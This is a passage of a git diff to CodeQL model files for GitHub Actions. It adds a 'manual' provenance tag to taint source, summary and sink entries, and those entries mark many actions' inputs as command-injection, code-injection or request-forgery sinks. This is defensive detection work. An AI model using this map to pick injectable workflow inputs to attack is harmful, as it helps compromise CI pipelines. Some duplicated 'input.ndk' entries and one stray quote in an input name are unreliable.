summaryModel data: - - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"] + - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index b3cb5aa39407..e05a3afd63a5 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] - - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index a84880cfdf10..a96ad45d624e 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index f32484a4f0d3..a70e8facf7c1 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"] \ No newline at end of file + - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 57c35c902141..66280f8bdd64 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index 9ce43e68a757..65965daeb1d4 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["magefile/mage-action", "*", "input.args", "command-injection"] + - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ac3aaa67def0..ba9a04f588bf 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["maierj/fastlane-action", "*", "input.lane", "command-injection"] - - ["maierj/fastlane-action", "*", "input.options", "command-injection"] - - ["maierj/fastlane-action", "*", "input.env", "command-injection"] + - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] + - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"] + - ["maierj/fastlane-action", "*", "input.env", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index 90fd673c705b..aea054e24b0a 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"] - - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"] - - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"] - - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] + - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"] + - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection", "manual"] + - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index 9f621758cffb..7a556a0f0ece 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact"] + - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 2c9f46b46f45..bb1c3ffca2a0 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] + - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"] - - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"] - - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"] - - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"] - - ["mattdavis0351/actions", "*", "input.tag", "command-injection"] + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index 1bcf8e7ce7ab..d3bec5ea39d0 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"] + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index dfa441761ab3..c65527150b5c 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] + - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 817067445681..25565b445fca 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"] - - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"] + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index 182977098389..d46a07dde969 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] + - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index aeca6db0d98d..2d162fbc9147 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"] \ No newline at end of file + - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index b9358bd2d69a..fc91bacdb72d 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2", "*", "input.install", "command-injection"] - - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"] \ No newline at end of file + - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] + - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index a18319954e3b..8b2b4e79afa5 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"] - - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index f46c40a8f9cb..2ea1fdf68556 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"] - - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"] + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] + - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 219de80c39e2..21e0d819db74 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"] + - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index dc3c2739e87f..bcc8ce6b80db 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nanasess/setup-php", "*", "input.php-version", "command-injection"] + - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 30679750f131..741ab37eb9b6 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"] - - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"] - - ["nick-fields/retry", "*", "input.command", "command-injection"] + - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] + - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"] + - ["nick-fields/retry", "*", "input.command", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index c600e7a93b64..a9d6b80a627f 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octokit/graphql-action", "*", "input.query", "request-forgery"] + - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index ed9088c9f568..73d4df99af28 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octokit/request-action", "*", "input.route", "request-forgery"] + - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index 988c3d5e674f..fb6ae5102e1b 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"] + - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 91a3382348ca..8b29e5c99881 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"] + - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index d9d15dc94b27..5a5cedcaca5f 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"] + - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index 6bc0467692d2..12d3f23f8fdf 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"] - - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"] - - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] + - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"] + - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 62dea47d8184..30be564c42a4 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"] - - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"] + - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] + - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 525d0199859d..13d4cfeb814d 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"] - - ["py-actions/flake8", "*", "input.plugins", "command-injection"] - - ["py-actions/flake8", "*", "input.path", "command-injection"] - - ["py-actions/flake8", "*", "input.ignore", "command-injection"] - - ["py-actions/flake8", "*", "input.exclude", "command-injection"] - - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"] - - ["py-actions/flake8", "*", "input.args", "command-injection"] + - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.path", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.ignore", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.exclude", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.max-line-length", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 5aac0f894327..3043c9b30ec2 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"] + - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index d32c6509ad7e..29d51d1bfbba 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"] - - ["pyo3/maturin-action", "*", "input.target", "command-injection"] - - ["pyo3/maturin-action", "*", "input.command", "command-injection"] - - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"] + - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] + - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] + - ["pyo3/maturin-action", "*", "input.command", "command-injection", "manual"] + - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index c4ea326ecef0..75a9650a92fb 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -3,22 +3,22 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index 52c478dd1d4d..9b0ec011fd62 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact"] + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index 7213a39f992b..a0c4d6f7ec50 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.cache", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index 3207c6d75211..b5d4629003b7 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"] - - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"] - - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"] - - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"] - - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"] + - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.docker-user", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index d00d78bcba8a..4b96edeccc2f 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"] - - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"] + - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] + - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git 